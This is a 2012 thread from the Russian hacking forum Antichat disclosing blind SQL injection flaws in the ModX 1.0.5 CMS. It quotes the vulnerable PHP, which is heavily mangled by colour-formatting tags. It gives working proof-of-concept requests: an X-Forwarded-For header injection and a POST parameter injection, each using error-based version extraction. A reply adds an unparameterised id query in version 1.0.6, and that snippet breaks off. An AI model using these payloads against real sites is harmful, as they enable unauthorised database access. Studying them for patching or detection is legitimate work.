Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Веб-уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=114)
-   -   bSQL inj <== ModX v. 1.0.5 (https://forum.antichat.xyz/showthread.php?t=345744)

TeamPro 08.08.2012 05:29
Автор: TeamPRO (c)

Дата: 22.07.2012

Наличие патча: -

Blind SQL Injection

Требования: Аккаунт пользователя / magic_quotes = off

Уязвимый скрипт: /modx-1.0.5/assets/snippets/weblogin/weblogin.inc.php

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if ([/COLOR][COLOR="#0000BB"]getenv[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"HTTP_CLIENT_IP"[/COLOR][COLOR="#007700"]))[/COLOR][COLOR="#0000BB"]$ip[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]getenv[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"HTTP_CLIENT_IP"[/COLOR][COLOR="#007700"]);

 else if([/COLOR][COLOR="#0000BB"]getenv[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"HTTP_X_FORWARDED_FOR"[/COLOR][COLOR="#007700"]))[/COLOR][COLOR="#0000BB"]$ip[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]getenv[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"HTTP_X_FORWARDED_FOR"[/COLOR][COLOR="#007700"]);

 else if([/COLOR][COLOR="#0000BB"]getenv[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"REMOTE_ADDR"[/COLOR][COLOR="#007700"]))[/COLOR][COLOR="#0000BB"]$ip[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]getenv[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"REMOTE_ADDR"[/COLOR][COLOR="#007700"]);

 else[/COLOR][COLOR="#0000BB"]$ip[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"UNKNOWN"[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'ip'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$ip[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$itemid[/COLOR][COLOR="#007700"]= isset([/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]]) &&[/COLOR][COLOR="#0000BB"]is_numeric[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]]) ?[/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]] :[/COLOR][COLOR="#DD0000"]'NULL'[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]$lasthittime[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]time[/COLOR][COLOR="#007700"]();[/COLOR][COLOR="#0000BB"]$a[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]998[/COLOR][COLOR="#007700"];

 if([/COLOR][COLOR="#0000BB"]$a[/COLOR][COLOR="#007700"]!=[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"REPLACE INTO[/COLOR][COLOR="#0000BB"]$dbase[/COLOR][COLOR="#DD0000"].`"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$table_prefix[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"active_users` (internalKey, username, lasthit, action, id, ip) values(-"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'webInternalKey'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]", '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'webShortname'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]"', '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$lasthittime[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"', '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$a[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"', "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$itemid[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]", '[/COLOR][COLOR="#0000BB"]$ip[/COLOR][COLOR="#DD0000"]')"[/COLOR][COLOR="#007700"];

 if(![/COLOR][COLOR="#0000BB"]$rs[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$modx[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]dbQuery[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"])) {

[/COLOR][COLOR="#0000BB"]$output[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"error replacing into active users! SQL: "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"];

 return;

 }

[/COLOR][/COLOR
P0C:

авторизируемся.Посылаем еще один запрос со своими куками.

Код:
Code:
GET \ POST http://localhost/modx-1.0.5/
X_FORWARDED_FOR: 127.0.0.1'and(select*from(select(name_const(version(),1)),name_const(version(),1))a)and'dasa
Cookie: [mycookies]
--->

Код:
Code:
Execution of a query to the database failed - Duplicate column name '5.0.92-log' »
Blind SQL Injection

[COLOR="rgb(46, 139, 87)"]Требования: аккаунт администратора[/COLOR]

Уязвимый скрипт: /modx-1.0.5/assets/modules/docmanager/classes/dm_backend.class.php

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]foreach ([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"]as[/COLOR][COLOR="#0000BB"]$key[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$value[/COLOR][COLOR="#007700"]) {

 if ([/COLOR][COLOR="#0000BB"]substr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$key[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]10[/COLOR][COLOR="#007700"]) ==[/COLOR][COLOR="#DD0000"]'update_tv_'[/COLOR][COLOR="#007700"]&&[/COLOR][COLOR="#0000BB"]$value[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]'yes'[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#0000BB"]$tvKeyName[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]substr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$key[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]10[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$typeSQL[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]modx[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]select[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'*'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]modx[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getFullTableName[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'site_tmplvars'[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#DD0000"]'id='[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$tvKeyName[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]modx[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getRow[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$typeSQL[/COLOR][COLOR="#007700"]);

[/COLOR][/COLOR
P0C:

Код:
Code:
POST http://localhost/modx-1.0.5/manager/index.php?a=112&id=1

tid=3&pids=1&template_id=3&tabAction=changeTV&update_tv_1/**/or/**/(select/**/count(*)/**/from/**/(select/**/1/**/union/**/select/**/2/**/union/**/select/**/3)x/**/group/**/by/**/concat(version(),floor(rand(0)*2)))=yes
--->

Код:
Code:
Execution of a query to the database failed - Duplicate entry '5.0.92-log1' for key 'group_key' »

Konqi 08.08.2012 09:51
не знаю как в 1.0.5 но в 1.0.6 параметр id уязвимо, хотя скуля без вывода

modx/manager/actions/mutate_user.dynamic.php

[PHP]
PHP:
[COLOR="#000000"]if ($_GET['a'] =='12') {// only do this bit if the user is being e dited

$sql="SELECT * FROM$dbase.`".$table_prefix."member_groups` where member=".$_GET['id'] ."";

$rs=mysql_query($sql);

$limit=mysql_num_rows($rs);

for ($i=0;$i[COLOR="#007700"]


Время: 22:30